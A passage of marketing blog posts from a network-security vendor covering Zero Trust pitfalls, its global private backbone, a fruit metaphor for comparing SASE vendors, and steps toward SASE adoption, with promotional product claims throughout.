context that informs decisions to be made around access and security.  As each business varies in its data flows and security concerns, this context consists of data feeds, as depicted in figure 1, that includes compliance data, log data, threat intelligence feeds and user and application data, as well as other data sources captured across the network. The more context you have, the better decisions your Zero Trust deployment will make. The 5 Most Common Pitfalls in Zero Trust Projects The concept of Zero Trust is often misunderstood, potentially resulting in misaligned strategies that don’t meet the organization’s needs. Gartner defines Zero Trust as a ‘mindset that defines key security objectives’ while removing implicit trust in IT architectures. This implies that today’s CISOs would be well-advised to pursue their Zero Trust strategy thoughtfully, to ensure they avoid common pitfalls that impede most security initiatives. Pitfall 1: Failing to Apply the Key Tenants of Zero Trust  Zero Trust came to life as a resolution for overly permissive access rights that created broad security risks throughout networks. The concept of implicit deny is perceived as the catch all terminology for a better security architecture, assuming it to be the fix-all for all things security. Considering this, it may be easy for CISOs to inadvertently disregard the core purpose of Zero Trust and overlook some key architectural tenants that influence Zero Trust architectures.    While each of the Zero Trust frameworks call out a number of architectural attributes of Zero Trust, for the purpose of this section, we will highlight a few that we feel should not be overlooked.  Dynamic policy determines access to resources – dynamic polices focus on the behavioral characteristics of both the user and devices when determining whether access will be granted or denied.  A subset of these characteristics can include location, device posture, data analytics and usage patterns.  For example, is the user in a restricted location, or are user and device credentials being used correctly? Any of these should determine whether access should be granted and at what level.  Continuous monitoring and evaluation – no user or device should blindly be trusted for access to network or application resources. Zero Trust dictates that the state of both the resource and the entity requesting access to be continually monitored and evaluated. Those deemed to be risky should be treated accordingly, whether it is limited access or no access.  Segmentation & Least Privileges – Zero Trust should eliminate blind trust and by extension, blanket access to targeted resources from all employees, contractors, supply chain partners, etc.  and from all locations.  And when access is granted, only the minimal amount of access required to ensure productivity should be granted. This ensures the damage is limited should there be a breach of some kind.  Context Automation – For Zero Trust to deliver the desired impact, organizations need to collect lot of data and contextualize this.  This context is the key as without context, well-informed decisions for user or device access cannot be made.  The more context, the better the decisions being made.  Cato SASE Cloud Approach: The Cato SASE Cloud takes a risk-based approach to Zero Trust, combining Client Connectivity & Device Posture capabilities with more holistic threat preventions techniques.  Because we have full visibility of all data flows across the network, we utilize this, as well as threat intelligence feeds and user and device behavioral attributes to pre-assess all users and devices prior granting access onto the network. This in-depth level of context allows us to determine their client connectivity criteria and device suitability for network access, as well as continually monitor and assess both the user and device throughout their life on the network. Additionally, we use AI & Machine Learning algorithms to continually mine the network for indications of malware or other advanced threats and will proactively block these threats to minimize the potential damage inflicted upon the network. [boxlink link="https://www.catonetworks.com/resources/the-hybrid-workforce-planning-for-the-new-working-reality/?utm_source=blog&utm_medium=top_cta&utm_campaign=hybrid_workforce"] The Hybrid Workforce: Planning for the New Working Reality | EBOOK [/boxlink] Pitfall 2: Treating Zero Trust a Like a Traditional VPN  When deploying Zero Trust, many organizations tend to rely on legacy security processes that are no longer applicable or select the shiny new toy that equates to a less viable solution. In 2021, Gartner noted that some organizations reported initially configuring their Zero Trust deployments to grant full access to all applications, which ironically, mirrored their VPN configuration. One of the intrinsic shortcomings of traditional VPNs, beyond the connectivity issue, is the challenge of least privilege user access to critical applications once a user has been authenticated to the network. Traditional VPNs cannot provide partial or specific access to selected applications or resources.  So, deploying Zero Trust like their old VPN leaves us to wonder what problems they are truly solving, if any.    CISOs must remember that existing security architectures are based on the concept of implicit trust, which leads to unknown, yet ever-increasing risk to modern enterprise environments. The ultimate goal of Zero Trust is to ensure that users and their devices prove they can be trusted with access to critical resources. Hence, the ultimate goal for any CISO in creating a Zero Trust strategy is to reduce the risk posed by users and devices, and in the event of a successful breach, limit the spread and impact of the attack.   Cato SASE Cloud Approach: Cato Networks realizes that existing VPN architectures are too inadequate to provide the depth of access protections for critical enterprise resources.  The Cato approach to Zero Trust invokes consistent policy enforcement everywhere to ensures least privilege access to all enterprise & cloud resources, while also taking a holistic approach to preventing cyber threats. We consume terabytes of data across our entire SASE Cloud backbone, and this informs how we apply additional protections once users and devices are on the network.  Pitfall 3: Not understanding the true impact on the user, IT and Security  Unfortunately for many CISOs, IT and Security departments do not always operate with aligned priorities and desired outcomes. IT departments may have critical projects they deem to have a higher priority than Security. Security teams, being tasked with strengthening the organization’s security posture may view Zero Trust as the only priority. In such cases of mis-aligned priorities, Zero Trust efforts may result in incomplete or mis-configured deployments, expanding security gaps and increasing blind spots. And let’s not forget the end user. When IT organizations finally makes significant changes to networks, security, or other systems, if priorities aren’t aligned, the end results will produce adverse user outcomes.    When it comes to Zero Trust, CISOs must ensure they are mapping out the journey. In doing so, IT and Security teams should establish a “Hippocratic Oath” of “first, do no harm”, similar to that of the medical community. This could make it easier to map the journey to Zero Trust where the solution is simple to deploy, easy to manage, easily scales at the speed of the business, and provides positive outcomes for all parties impacted.  Critical to this is the user – Zero Trust must not impede their ability to get things done.   Cato SASE Cloud Approach: At Cato Networks, our entire approach to Zero Trust is to ensure the most holistic user experience with zero impact on productivity. Often when deploying or upgrading to new security technologies, security teams will inadvertently have policy mis-matches that result in inconsistent policy enforcement in certain segments of the network. Zero Trust, if not implemented correctly, increases the risk level for negative user experiences, which will reflect poorly upon the CISO and their teams. With the Cato SASE Cloud, Zero Trust & Client Access policies are applied once and enforced everywhere.  This ensures specific and consistent policy treatment for all users and devices based upon identity and user and devices access criteria.  "The hallmark of Zero Trust is Simplicity"John Kindervag  Pitfall 4: Inadequately Scoping Common Use Cases   CISOs are so inundated with everyday security concerns that identifying all possible use cases for their Zero Trust initiative, while seemingly straight-forward, could be easily overlooked. It is easy to drill down into the core requirements of Zero Trust, approaching from a broad enterprise perspective, yet neglect smaller details that might derail their project.  While there are numerous use cases and each would depend on the individual organization, this document calls out (3) use cases that, if not properly planned for, will impact all non-HQ based or non-company users.  Multi-branch facilities – It is common that today’s enterprises will comprise of a single headquarter with multiple global locations. More commonly, these global locations exist in a shared space arrangement whereby the physical network and connectivity is independent of the company. In such cases, these employees still require access to enterprise applications or other resources at the HQ or company data center.  In other cases, a user may be a road warrior, using unmanaged personal devices, or be located in restricted locations. Given this, great care and consideration must be given in determining if, when and how to grant access to necessary resources while denying access or restricting actions to more sensitive resources.  Multi-cloud environments – More enterprises are utilizing multi-cloud providers to host their applications and data. There are occasions whereby the application and data source exist in different clouds. Ideally, these cloud environments should connect directly to each other to ensure the best performance.  Contractors and 3rd party partners – Contractors and 3rd party supply chain partners requiring access to your network and enterprise resources is very common these days.  Often these entities will use unmanaged devices and/or connect from untrusted locations. Access can be granted on a limited basis, allowing these users and devices only to non-critical services.  CISOs must factor in these and other company specific use cases to ensure their Zero Trust project does not inadvertently alienate important non-company individuals.  Cato SASE Cloud Approach: At Cato Networks, we acknowledge that use cases are customer, industry, and sometimes, location dependent.  And when Zero Trust is introduced, the risk of inadvertently neglecting one or more critical use cases is magnified.  For this reason, we built our architecture to accommodate, not only the most common use cases, but also obscure and evolving use cases as well. The combination of our converged architecture, global private backbone, single policy management, and virtual cloud sockets ensure we provide customers with the most accommodating, yet most robust and complete Zero Trust platform possible. Pitfall 5: Not having realistic ROI expectations  ROI, for many IT-related initiatives is rather difficult to measure, and many CISOs often find themselves twisted on how to demonstrate this to ensure company-wide acceptance. Three questions around ROI that are traditionally difficult to answer are:  What should we expect?  When should we expect it?  How would we know?   Like many things technology-related, CISOs are hesitant to link security investments to financial metrics. However, delaying a Zero Trust deployment can yield increased costs, or negative ROI over time that can be measured in increased data breaches, persistent security blind spots, inappropriate access to critical resources, and misuse of user and resource privileges, just to name a few.   CISOs can address these ROI concerns through a number of strategies that extend beyond simple acquisition costs and into the broader operational costs. With the right strategy and solution approach, a CISO can uncover the broader strategic benefits of Zero Trust on financial performance to realize it as an ROI-enabler.  Cato SASE Cloud Approach:  It is easy to appreciate the challenge of achieving ROI from Security projects. As mentioned, CISOs like CIOs are hesitant to link security investments to financial metrics. However, with an appropriate Zero Trust strategy, organizations will assure themselves enormous savings in IT effort and vendor support. Organizations deploying a Zero Trust solution based off a converged, cloud-native, global backboned SASE Cloud like Cato can expect more efficient cost structures while achieving greater performance. By converging critical security functions, including Zero Trust, into a single software stack within the Cato SASE Cloud, organizations are able to immediately retire expensive, non-scalable, maintenance-intensive VPN equipment. This approach delivers ease of deployment and simplistic management, while drastically reducing maintenance overhead and IT support costs. Achieving Your Organization’s Zero Trust Goals with Cato SASE Cloud  Justifying a security transformation from implicit trust to Zero Trust is becoming easier and easier.  However, determining the right approach to achieving an organization’s Zero Trust goals can be daunting.  It is challenging when factoring in the broad paradigm shift in how we view user and device access, as well as numerous use case considerations with unique characteristics.  Zero Trust Network Access is an identity-driven default-deny approach to security that greatly improves your security posture. Even if a malicious user compromises a network asset, ZTNA can limit the potential damage. Furthermore, the Cato SASE Cloud’s security services can establish an immediate baseline of normal network behavior, which enables a more proactive approach to network security in general and threat detection in particular. With a solid baseline, malicious behavior is easier to detect, contain, and prevent. "The Zero Trust is a security model based on the principle of maintaining strict access controls and not trusting anyone by default; a holistic approach to network security, that incorporates a number of different principles and technologies.” Ludmila Morozova-Buss  The Cato SASE Cloud was designed for the modern digital enterprise. Our cloud-native architecture converges security features such as Zero Trust Network Access (ZTNA), SWG, NGFW, IPS, CASB, and DLP, as well as networking services such as SD-WAN and WAN Optimization across a global private backbone with a 99.999% uptime SLA. As a result, Cato is the only vendor currently capable of delivering seamless ZTNA on a true SASE platform for optimized performance, security, and scalability.   Zero Trust is a small part of SASE.  The Cato SASE Cloud restricts access of all edges – site, mobile users and devices, and cloud resources – in accordance with Zero Trust principles. Click here to understand more about Cato Networks’ approach to Zero Trust.

Not All Backbones are Created Equal

It’s no secret that many enterprises are reevaluating their WAN. In some cases, it might be an MPLS network, which is no longer suitable (or affordable) for the modern digital business. In other cases, it might be a global SD-WAN deployment, which relied too much on the unpredictable Internet.   Regardless of why the company needs...
Not All Backbones are Created Equal It’s no secret that many enterprises are reevaluating their WAN. In some cases, it might be an MPLS network, which is no longer suitable (or affordable) for the modern digital business. In other cases, it might be a global SD-WAN deployment, which relied too much on the unpredictable Internet.   Regardless of why the company needs to transform its enterprise network, the challenge remains the same: How do you get secure connections with the same service level of predictability and consistency as MPLS at an Internet-like price point? This calls for a SASE service built on a global private backbone.   Why a Global SASE Service?   Even enterprises who previously thought of themselves as regional operations find they need global reach today. Why? Because users and data are everywhere. They can (and probably do) sit in homes (or cafés) far from any place an office might be situated, accessing cloud apps across the globe. Pulling traffic back to some site for security inspection and enforcement adds latency, killing the application experience. Far better is to put security inspection wherever users and data sit. This way they receive the best possible experience no matter where that executive might be sitting in the world.   Why Private?  Once inspected, moving traffic to a private datacenter or other sites across the global Internet is asking for trouble. The Internet might be fine as an access layer, but it’s just too unpredictable as a backbone. One moment a path might be direct and simple; the next your traffic could be sent for a 40-stop visit the wrong way around the globe. With a private backbone, optimized routing and engineering for zero packet loss makes latency far lower and more predictable than across the global Internet.  Why Not Private Networks from Hyperscalers?   All major public cloud providers – AWS, Azure, and GCP -- realize the benefits of global private networks and offer backbone services today. So why not rely on them?  Because while a hyperscaler backbone might be able to connect SD-WAN devices, it lacks the coverage to bring security inspection close to the users across the globe. Only a fraction of the many hyperscaler PoPs can run the necessary security inspections and only a smaller fraction can act as SD-WAN on-ramps. At last check, for example, only 39 of Azure's 65 PoPs supported Azure Virtual WAN. And then there's the question of availability. The uptime SLAs offered by cloud providers are too limited, only running 99.95% uptime, while traditional telco service availability typically runs at four nines, 99.99% uptime. [boxlink link="https://www.catonetworks.com/resources/global-backbone-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=global_backbone_demo"] Global Backbone | Watch Cato Demo [/boxlink] Why Cato’s Global Private Backbone? For those reasons and more, enterprises are replacing their legacy network with Cato’s global private backbone. Today, it’s the largest private SASE network spanning 70+ PoPs worldwide.   Built as a cloud-native network with a global private backbone, Cato SASE Cloud has revolutionized global connectivity. Using software, commodity hardware, and excess capacity within global carrier backbones, we provide affordable SLA-backed connectivity at global scale.   And every one of our PoPs runs the Cato Single Pass Cloud Engine (SPACE), the converged software stack that optimizes and secures all traffic according to customer policy.  Our simple edge devices combine last mile transports, such as fiber, cable, xDSL, and 4G/5G/LTE. Encrypted tunnels across these last-mile transport carry traffic to nearest PoP. The same goes for our mobile clients (and clientless access). From the PoP, traffic is routed globally to the PoP closest to the destination using tier-1 and SLA-backed global carriers.   This model extends to cloud services as well. Traffic to cloud applications or cloud data centers exit at the PoP closest to these services, and in many cases within the same data center hosting both PoP and cloud service instance.   Key Benefit #1 – Optimized Performance  With built-in WAN optimization, Cato increases data throughput by as much as 40x. Advanced TCP congestion control enables Cato edges to send and receive more data, as well as better utilize available bandwidth. Other specific optimization improvements include:   Real-time network condition tracking to optimize packet routing between PoPs. We don’t rely on inaccurate metrics like BGP hops, but rather on network latency, packet loss, and jitter in the specific route.  Controlling the routing and achieving MPLS-like consistency and predictability anywhere in the world. For example, the path from Singapore to New York may work better through Frankfurt than going direct, and Cato SASE Cloud adapts to the best route in real time.  Applying dynamic path selection both at the edge and at the core – creating end-to-end optimization.  Accelerating bandwidth intensive operations like file upload and download through TCP window manipulation.  Key Benefit #2 – Self-Healing and Resiliency To ensure maximum availability, Cato SASE Cloud delivers a fully self-healing architecture. Each PoP has multiple compute nodes each with multiple processing cores. Each core runs a copy of Cato SPACE, which manages all aspects of failure detection. Failover and fail back are automated, eliminating the need for dedicated planning or pre-orchestration. More specifically, resiliency capabilities include:    Automatically working around backbone providers in case of outage or degradation to ensure service availability. Ensuring that if a compute node fails, tunnels seamlessly move to another compute node in the same PoP or to another nearby PoP. And in the unlikely event that a tier-1 provider fails or degrades, PoPs automatically switch to one of the alternate tier-1 providers. Specialized support for challenging locations like China. Cato PoPs are connected by private and encrypted links through a government-approved provider to Cato's Hong Kong PoP.  A great example of Cato resiliency at work was the recent Interxion datacenter outage in London housing Cato’s London PoP. The outage disrupted trading on the London Metal Exchange for nearly five hours. And for Cato? A few seconds. Read this first-hand account from Cato’s vice president of operations, Aviram Katzenstein.  Key Benefit #3 – Secure and Protected Cato’s global private backbone has all security services deployed in each of the Cato PoPs. This means that wherever you connect from, your traffic is protected by a full security stack at the PoP nearest to you. From there, Cato’s backbone carries your traffic directly to its destination, wherever it may be. This enables full security for all endpoints without any backhauling or additional stops along the way.   Extensive measures are taken to ensure the security of Cato SASE Cloud. All communications – between PoPs, with Cato Sockets, or Cato Clients – are secured by AES-256 encrypted tunnels. To minimize the attack surface, only authorized sites and remote users can connect and send traffic to the backbone. The external IP addresses of the PoPs are protected with specific anti-DDoS measures. Our service is ISO 27001 certified.  Key Benefit #4 – Internet-like Costs  We reduce the cost of enterprise-grade global connectivity by leveraging the massive build-out in IP capacity. All Cato PoPs are connected by SLA-backed transit capacity across multiple tier-1 networks. The Cato software monitors the underlying, capacity selecting the optimum path for every packet. The result: a network with far better performance than the public Internet at a far lower cost than global MPLS.  A Proven Solution for Global Connectivity  Cato’s backbone delivers better performance, availability, and coverage than any single carrier. A single tier-1 carrier can’t reach all parts of the globe, and a single tier-1 carrier can’t provide the predictability of MPLS. Just as enterprises use SD-WAN to aggregate Internet services and overcome the limitations of any one service, SASE leverages SD-WAN to aggregate tier-1 carriers to overcome the limitations of any one network.   “Opening new stores now goes smoothly, pricing is affordable, the cloud firewall and private backbone provide a great experience, and services are easy to set up.”  Steve Waibel, Director of IT, Brake Masters “We no longer had to have a separate IDS/IPS, on-premises firewalls, or five different tools to report on each of those services. We could bring our cloud-based services directly into Cato’s backbone with our existing sites and treat them all the same.” Joel Jacobson, Global WAN Manager, Vitesco Technologies  “The fast backbone connection most of the way to its ACD cloud service was a big plus. QOS was always a struggle before Cato. It’s pretty awesome to hit that Cato network and see that traffic prioritized all the way through to the cloud, rather than just close to our site.” Bill Wiser, Vice President of IT, Focus Services  Thanks to the low cost of the Cato solution, Boyd CAT more than doubled branch bandwidth, by moving from 10 to 25 Mbits/s - to dramatically improve application performance together with Cato's optimization and global private backbone. “The branches were just loving it. They started fighting over who would transition to Cato next. We were able to discontinue all our MPLS connections.”Matt Bays, Communications Analyst, Boyd CAT  With Cato SASE, office and remote and home workers connect to the same high-speed backbone. Mobile and home users benefit from the same network optimizations and security inspections as office workers. “This year, the entire WAN and Internet connectivity will be running on Cato.”  Eiichi Kobasako, Chief of Integrated Systems, Lion Corporation 

Evaluating SASE Vendors? Here’s Why You Should Compare Apples and Oranges

There is a common cliché that is often thrown around during SASE vendor discussions “you are comparing apples to oranges.” This phrase is typically used when looking at functions or features of a product, but often is used by people looking to discredit a solution offered by a competitor. It is natural, however, as every...
Evaluating SASE Vendors? Here’s Why You Should Compare Apples and Oranges There is a common cliché that is often thrown around during SASE vendor discussions “you are comparing apples to oranges.” This phrase is typically used when looking at functions or features of a product, but often is used by people looking to discredit a solution offered by a competitor. It is natural, however, as every single vendor is inherently biased to believe that their offering is the best. So, let us take a look at what this expression means, and why we should compare apples and oranges when evaluating SASE solutions. Why Compare Apples and Oranges An apple and an orange have many things in common. They are both fruits, they are both round, they both can taste sweet (or sour), and both can do damage if they are thrown in anger. Based on these characteristics alone, there is no discernible difference between the two. Now, what are the differences? The question you need to ask yourself is, “What do I want?” If you are looking to make an apple pie, then the choice is obvious. However, if your goal is to just eat something fruity, then that is where the deliberation begins. Do you buy an apple? Do you buy an orange? If you do not have an idea in mind, it is easy to get overwhelmed in the fruit aisle… Mapping Architecture to Your End Goal Look at the solutions and technologies that you use today within your corporate network and think about the purpose of their design. Have you purchased an orange or an apple, or do you have a chaotic digital fruit-salad which has grown organically over time due to a myriad of tastes and preferences? If so, you need to re-evaluate your entire corporate strategy to help you grow and develop into the future. The architecture of every fruit has a purpose and has been designed in an optimal way to ensure continuity of their lineage. The orange has segments which may hold individual seeds, while grapes grow in a bunch connected by the stalks. This his could be compared to a microservice architecture, such as Docker (packing containerized applications on a single node) or Kubernetes (running containerized applications across a cluster). Each fruit has its pros, cons, and uses, however the more fruit you want, the more difficult your life becomes. You need to understand the architecture of each fruit, and then go on to identify the best-practice for fruit combinations. You need to know the purpose and intent of each piece of fruit, and you need to locate a myriad of different fruits. This is manageable if there’s only one person purchasing and eating fruit for the company, but as soon as you add another personality – the situation evolves, in a negative way, and we haven’t even thought of the fruit bowl challenge. [boxlink link="https://www.catonetworks.com/resources/sase-rfi-rfp-template/?utm_source=blog&utm_medium=top_cta&utm_campaign=sase_rfp_template"] SASE RFI/RFP Made Easy | Get the Template [/boxlink] The Fruit Bowl Challenge Every time you purchase a piece of fruit, you need to store it somewhere. This could be in the fridge, in a bowl, in a cupboard, or left in your car under the scorching sun. To purchase each piece of fruit, you may need to go to different shops, with varying levels of quality. Should you purchase a Jazz Apple or a Braeburn, a Clementine or a Satsuma? Once you’ve identified which specific type of fruit you want, where can you get it at the right price? Shop A may offer it at a lower price than Shop B today, but that’s a limited time offer. When you’re trying to maximise a constrained budget, the time investment required to ensure you purchase something of quality and longevity can be a moderately significant effort. Now, consider each piece of fruit is a component of your network. You want to purchase edge security, so you gather several vendors to check for bruises, blemishes, and pack-size. After making your decision on what to buy (after months of deliberation, RFPs, and proof-of-concepts), you then move to the negotiation stage with hundreds of distributors, resellers, or VARs. Finally, you close on the deal, and they send you a truck full of apples. It’s what you wanted right? I hope you have somewhere to store all those apples, because the clock is ticking, and they’re already starting to spoil. Turning Apples into Apple Pie So, you have your apples, you can see them, and you proudly gaze upon the mountain of fruit sat in your warehouse. You’ve spent a lot of money on these apples, and you’ve cashed in all your favours with your CFO to get the budget approved for this gargantuan upfront cost. Now the real work begins, as you need to prepare for the implementation, deployment, and creation of your apple pies (or firewall/site deployments, I’m sticking to the metaphor here!) The first thing you do is hire a group of people to move the apples into neat piles. Then you hire another group of people to come and peel the apples, as well as a disposal company to remove the packaging/peel that you no longer need. Once fully peeled and sliced, you then need a way to transport the prepared goods to the next location for processing – all of this is required even before your apples touch pastry. However, you accounted for this during your initial budget spend, and do not see it as a concern, until you notice that some of the fruit has already turned rotten. You need to contact the vendor to initiate a return (RMA), and this is where you notice problems. The Rotten Apple Problem “Your support contract on this apple has expired.” I personally used to work for an appliance (fruit) based company, and I had to tell customers this on an almost daily basis. People call Support for assistance as their sites may be down, or critical applications have been impacted by service outages and they need urgent P1 Support. However, if the customer had not actively maintained their Support contracts, then there is no legal obligation to assist resolve their problem. In fact, if the vendor operates on a ‘Support & Maintenance per device’ basis, it’s within their interest to actively withhold assistance until you pay the money to reinstate the contract. How many apples did you just buy? Did you take a Support contract out on every apple? Are you actively tracking the start and end-date of the renewal? Have you invested in administrative staff to ensure you have consistency of care? Will this vendor assist you with bruised apples, or does your contract only cover total losses? These are questions you should be asking yourself as you review the entire total cost of ownership for every single purchased asset. If you’ve amortized an apple over a 5-year period, do you think you’ll still be wanting the same apple 5 years from now? Your taste may have changed. Oh, and did you remember, currently you haven’t just purchased apples for your company. Life isn’t that simple. You’ve also purchased your grapes, peaches, plums, pears, bananas and more, because you want to maintain in complete control of your network using point products. How does this make you feel having to constantly maintain this supply chain? Your life has become confusing, and this all started because somebody originally said that you were ‘comparing apples to oranges.’ The Cato Solution We’ve been talking in metaphors during this article, but let’s drop the pretence and start talking directly. Today your network is most likely built with a series of different products built by a myriad of vendors. You have network firewalls, internet gateways, CASB engines, VPN concentrators, anti-malware engines, Intrusion Prevention Systems (IPS) and many more. Each of these products have been built by their vendors in the belief that they are the best in their own functional field, however to you as a consumer of products, you have a wide portfolio of products that you must learn (as well as maintain, update, and manage.) Dealing with these administrative tasks are likely not the reason you decided to get into IT, but here you are. Life doesn’t have to be this way. Cato Networks offers a truly converged service offering covering all aspects of Networking, Security and Access. The term ‘service offering’ is key, as we maintain, manage, and continually improve our service in the cloud, ensuring that you have the latest-and-greatest in networking and security coverage without having to lift a finger. Unlike product-based companies, you don’t have to have significant warehouse space to store hundreds of servers and appliances, you don’t need to worry about multitudes of service contracts, and best of all, you don’t need to worry about upgrading or patching (as this is done by Cato Networks.) How to Solve the Fruit Bowl Challenge with Cato So, in short, apples are great, and oranges are fine. But why limit yourself? What if I told you that you could have BOTH apples and oranges? What if I told you that you could get both using a single service subscription? What if I told you that we’re constantly growing our catalogue of SASE features and offerings, so you also get peaches, plums, pineapples, and pears at no extra cost? What if I told you that new fruit is being added every two weeks? Why limit yourself to just buying apples, when Cato can offer you every fruit under the sun, whenever you want it, all at the click of a button.

Solving Real-World Challenges – Your Pathway to SASE

We are witnessing a tremendous shift in mindset regarding technology’s relationship to the business. As IT leaders learned during Covid, business challenges are IT challenges, and IT challenges are business challenges. As digitization continues to advance, these leaders continue to face an array of challenges, and the solutions they choose will determine their success or...
Solving Real-World Challenges – Your Pathway to SASE We are witnessing a tremendous shift in mindset regarding technology’s relationship to the business. As IT leaders learned during Covid, business challenges are IT challenges, and IT challenges are business challenges. As digitization continues to advance, these leaders continue to face an array of challenges, and the solutions they choose will determine their success or failure. This article provides IT and security professionals with actionable ideas for selecting a robust platform for digital transformation to address the network and security challenges that adversely impact their business. We cover: Real-world challenges in need of solutionsThe Cato SASE ApproachSASE ComparisonsKey questions to ask yourself when looking for a solutionMapping Your Journey Real-world Challenges Breeds New Networking and Security Considerations Global Business Expansion Creates New Connectivity Requirements We are a global business society that is constantly expanding, whether organically into new markets or through mergers and acquisitions into new business lines. Whatever the impetus, there are real challenges these organizations will face. Adding new locations, for example, requires planning for global and local connectivity, which could be very inconsistent, depending upon the region. In the case of mergers, we must deal with inconsistent or incompatible networks architectures, while factoring in the unreliable nature of global connectivity over a public internet. And let’s not forget inconsistent security policies that add to your headaches. And finally, we must consider how all this affects migrating new users and apps onto your core network, as well as ensuring access and security policies are correct. Not impossible, but this could take weeks or months to achieve. All this results in unexpected consequences. Core Challenges: Rapid site deploymentInconsistent connectivityPublic Internet Transport On-premise to Cloud Migration Spurs Capacity Constraints Most obstacles in cloud adoption are related to basic performance aspects, such as availability, capacity, latency and scalability. Many organizations neglect to consider bandwidth and capacity requirements of cloud applications. These applications should deliver similar or better performance as legacy on-premise. However, with the rush to adapt to the new Covid-normal, many are finding this is far from reality. Scalability is also an issue with cloud deployments. As businesses continue to grow and expand, the greater the need for a cloud network that scales at the speed of their business, and doesn’t restrict the business with its technical limitations. All together, these are real issues IT teams continue to face today, and until now, saw little to no relief in sight. Core Challenges: Capacity planning and cost managementPoor app performanceScalability Expanding Cyber Threat Landscape Every year, like clockwork, we witness numerous global companies attacked by cyber criminals at least once per day. Many have had sensitive data stolen and publicly leaked. The pandemic only exacerbated this, pushing more employees further from the enterprise security perimeter. The growth in Work-From-Anywhere (WFA) introduced more remote worker security challenges than many expected, and not many were truly prepared. Additionally, as more organizations move their apps to cloud, providing security for these apps, as well as safe use of 3rd party SaaS apps, became an even stickier point for today’s enterprises. This, along with securing remote workers, is pushing IT leaders to face the harsh reality of their current cyber defense short-comings. As these businesses attempt some form of return to normal, it’s clear we may never make it back to traditional full-time office setup. WFA, as well as increased cloud usage, is here to stay, meaning the threats to the business will only increase. This means the potential costs of cyber breaches will follow suit. Core Challenges: Expanding cyber threat landscapeSecuring Work-from-anywhere (WFA)Improper employee usage The Cato SASE Approach to Rapid Digital Transformation It’s easy for most organizations to take a traditional approach to these challenges by looking for point solutions or creative chaining of technologies to create a bundled solution. While this provides an initial “feel-good” moment, this complex approach, invariably, creates more problems than it solves. Cato addresses these challenges through simplicity, and accomplish this through our converged, cloud-native approach. The Cato SASE (Secure Access Service Edge) Cloud converges core capabilities of networking, security and access management into a single software stack that delivers optimized cloud access, predictable performance, and unified policy management. Our SASE Cloud also provides complete visibility to inspect all traffic flows and provide advanced, holistic threat protection and consistent policy enforcement across a global private backbone. Cato addresses the challenges of global connectivity with our global private backbone, providing resiliency and performance SLA guarantees. Our cloud acceleration and optimization address the performance challenges faced when migrating enterprise apps to a cloud data center. And we address the security challenges with advanced, holistic security tools like NGFW, SWG, NextGen Anti-Malware, IPS, CASB and DLP. The Cato SASE Cloud enables enterprises to more rapidly and securely deliver new products and services to market, and more quickly respond to changes in business and technology dynamics that impacts their competitiveness. What is SASE and its Core Requirements? When deciding on SASE solutions, it is helpful to understand the core requirements as specified by Gartner and compare the various vendors in the market. For SASE to deliver on the promise of infrastructure simplicity, end-end optimization and limitless scalability, it must adhere to certain requirements: Converged, Cloud-native, Global, All Edges and Unified Management. Converged – A single software stack that combines network, security, and access management as one. This eliminates multiple layers of complexity. There is no need to stitch together bundles of disparate technologies. No need for multiple configuration tools to configure these different technologies. Convergence leads to simplistic architecture, easier management, and lower overall costs to the business.Cloud-Native – Built in the cloud for the cloud. Unlike appliances and virtualized solutions based upon appliances, being cloud-native enables vendor to deliver more flexibility in deployment and scale easier and faster when customers require more capacity.Global – Having a global presence means a network of PoPs everywhere, connected via a global private backbone. This means the network is everywhere the customer business is, delivering guaranteed performance and optimization for all traffic, consistent policy enforcement globally, network resilience to keep the business running.All Edges – Consistently and seamlessly delivering services to all edges (branch, endpoint, data center, cloud) without complex configuration or integration.Unified – A single, unified management console to provision and manage all services. No need to build dashboards to communicate with multiple technologies to manage the deployment . These are non-negotiable requirements that only a true Cloud-Native SASE solution can deliver. Appendix A highlights how the Cato SASE Cloud compares to appliance-based solutions. 7 Questions You Must Ask Before Selecting Your Next Solution To solve these issues, here are some key questions to ask yourself and your team. This will help you find the right solution to alleviate these challenges. 1. What real problems are we trying to solve? Identify what technical challenges are inhibiting you from delivering the best app, networking, and security experience for the business. Discover which projects are on hold because your infrastructure can’t accommodate them. The answers will provide you with insights into the actual problems you need to solve. 2. Which solution solves this, while scaling at the speed of our business? The natural response when encountering point-problems, is to find a point-solution. When doing so, ask yourself which solution delivers a more holistic approach to all your concerns (from question 1) while also providing a platform that scales at the speed of your business. 3. How can we ensure cost-effective, business continuity? Business continuity is non-negotiable, so when searching for a solution, ensure you find one that provides a resilient architecture that keeps your business running, no matter what happens. 4. With limited resources, how fast can we deploy new sites? Your solution shouldn’t just look good on paper, it needs to work well in practice. You can’t wait two, three or six months to launch new branches. Find a solution that enables rapid, zero-touch deployment, with minimal impact on your teams. 5. How can we build and maintain a consistent policy structure? Multiple configuration tools can create policy mismatches, which in turns, creates gaps and puts your critical applications at risk. To reduce this risk, find a solution that addresses configuration inconsistencies. 6. What’s the right amount of security? Security is an imperative, so most businesses try to implement multiple solutions with lots of cool-sounding features to make themselves feel secure. Unfortunately, multiple point solutions create security blind spots. Additionally, about 80%-90% of “cool” security features are never used. Achieve more with less by finding a solution that improves your security posture, independent from the size of your corporation or the size of your IT team 7. What’s our best option for global connectivity? Connectivity can make or break your business. Find a solution that provides increased capacity, guaranteed performance, and a global private backbone. Don’t settle for less. Mapping Your SASE Journey in 4 Easy Steps Now that you understand the networking and security challenges adversely affecting your business and their proposed solutions, now it’s time to map out your SASE journey. Doing this can be easier than you might think. 1. Prioritize: After you’ve answered the above questions, it’s now time to prioritize and create your migration plan. You may have one problem to solve, and in this case it’s easy. But most will have several, so once determined and prioritized, it’s time to plan and put it into action. Of course, Cato and our partners can assist, and even recommend a migration plan. 2. Solve the problem: This is wholly up to the organization. Some may prefer to tackle low-hanging fruit projects to build confidence in the teams. In this case, easy problems may go first. But others believe in “Go Big or Go Home”, so they may start with the most critical problems first. It’s basically up to the organization to define. 3. Observe: Observe the “wow” moments of that problem being solved. Whether performance, enhanced security, global connectivity, and so on – observe and enjoy. Then move onto the next problem or project. 4. Repeat and observe. It’s a straight-forward journey, and a well-defined plan makes it all flow smoothly. Does Your Solution Allow You to Plan for the Future? Solving problems the legacy way is how we acquired the complexity beast we have today. So, it’s time we change the game and become more strategic about addressing our IT challenges. The Cato SASE Cloud does this by converging all the capabilities organizations need today into a single platform, while future-proofing their businesses for whatever is next. In contrast, a non-SASE approach forces you to spend time and resources evaluating, acquiring, and integrating multiple technologies to address each requirement. Taking a platform approach to your transformation journey will address the challenges of today and prepare you for the opportunities of tomorrow. Taking a Cato SASE approach will enable your network to scale at the speed of your business. Appendix A – 